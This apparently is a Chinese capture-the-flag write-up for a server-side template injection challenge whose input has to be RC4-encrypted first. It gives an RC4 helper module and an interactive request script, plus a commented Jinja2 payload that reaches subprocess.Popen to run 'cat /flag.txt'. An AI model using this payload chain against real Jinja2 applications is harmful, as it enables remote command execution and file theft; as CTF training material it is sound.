ssti相关,但是不直接,套了层RC4
先目录扫描
rc4相关脚本,模块化写好的,可以复用:
from urllib import parse
def s_init(key):
S = list(range(256))
j = 0
for i in range(256):
j = (j + S[i] + ord(key[i % len(key)])) % 256 # key的中括号里面一长串是为了循环填充K盒
S[i], S[j] = S[j], S[i]
return S
def rc4_encode(plain_text, key):
S = s_init(key)
temp_data = []
i, j = 0, 0
for s in plain_text:
i = (i + 1) % 256
j = (j + S[i]) % 256
S[i], S[j] = S[j], S[i]
k = S[(S[i] + S[j]) % 256]
temp_data.append(chr(ord(s) ^ k))
return ''.join(temp_data)
def rc4_decode(cipher_text, key):
S = s_init(key)
temp_data = []
i, j = 0, 0
for s in cipher_text:
i = (i + 1) % 256
j = (j + S[i]) % 256
S[i], S[j] = S[j], S[i]
k = S[(S[i] + S[j]) % 256]
temp_data.append(chr(ord(s) ^ k))
return ''.join(temp_data)
def rc4_encode_url(plain_text, key):
return parse.quote(rc4_encode(plain_text, key))
if __name__ == '__main__':
# keys = str(input("Enter the key: "))
keys = 'HereIsTreasure'
plain = input("Enter the plain text: ")
print("The encoded text is: " + rc4_encode_url(plain, keys))
攻击脚本:
import requests
from rc4 import rc4_encode_url
url = 'http://node4.anna.nssctf.cn:28142/secret?secret='
while 1:
key = 'HereIsTreasure'
payload = input("Payload:")
# payload = "{{''.__class__.__mro__[2].__subclasses__()[239]('cat /flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}"
encoded_payload = rc4_encode_url(payload, key)
response = requests.get(url + encoded_payload)
print(encoded_payload + '\n')
print(response.text)
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
